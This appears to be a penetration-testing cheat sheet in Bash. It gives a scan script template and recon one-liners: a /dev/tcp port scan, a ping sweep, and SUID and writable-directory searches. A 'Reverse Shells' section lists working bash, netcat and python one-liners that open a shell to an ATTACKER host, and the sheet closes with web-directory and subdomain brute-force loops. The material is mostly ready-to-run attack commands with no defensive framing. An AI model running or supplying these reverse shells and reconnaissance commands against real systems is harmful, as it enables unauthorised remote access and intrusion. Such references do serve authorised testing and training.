Bash Security Automation

Script Template

#!/bin/bash
set -euo pipefail

# Colors
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m'

log() { echo -e "${GREEN}[+]${NC} $1"; }
warn() { echo -e "${YELLOW}[!]${NC} $1"; }
error() { echo -e "${RED}[-]${NC} $1"; exit 1; }

usage() {
    cat << EOF
Usage: $(basename $0) <target> [options]
  -o FILE    Output file
  -t NUM     Threads (default: 10)
  -v         Verbose
EOF
    exit 1
}

[[ $# -lt 1 ]] && usage
TARGET=$1
shift

while getopts "o:t:vh" opt; do
    case $opt in
        o) OUTPUT="$OPTARG" ;;
        t) THREADS="$OPTARG" ;;
        v) VERBOSE=1 ;;
        *) usage ;;
    esac
done

log "Starting scan on $TARGET"
# Main logic here

Useful One-Liners

# Port scan without nmap
for p in {1..1000}; do 
    (echo >/dev/tcp/$IP/$p) 2>/dev/null && echo "$p open"
done

# Ping sweep
for i in {1..254}; do 
    ping -c1 -W1 192.168.1.$i &>/dev/null && echo "192.168.1.$i up"
done | sort -t. -k4 -n

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Find writable directories
find / -writable -type d 2>/dev/null

# Extract URLs
grep -Eo 'https?://[^ ]+' file.txt | sort -u

# Parallel execution
cat targets.txt | xargs -P10 -I{} curl -s -o /dev/null -w "%{http_code} {}\n" {}

Reverse Shells

# Bash
bash -i >& /dev/tcp/ATTACKER/PORT 0>&1

# Netcat
nc -e /bin/sh ATTACKER PORT
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ATTACKER PORT >/tmp/f

# Python
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

Enumeration Snippets

# Web directory check
while read path; do
    code=$(curl -s -o /dev/null -w "%{http_code}" "$URL/$path")
    [[ $code != "404" ]] && echo "$code $path"
done < wordlist.txt

# Subdomain brute
while read sub; do
    host "$sub.$DOMAIN" 2>/dev/null | grep "has address" && echo "$sub.$DOMAIN"
done < subdomains.txt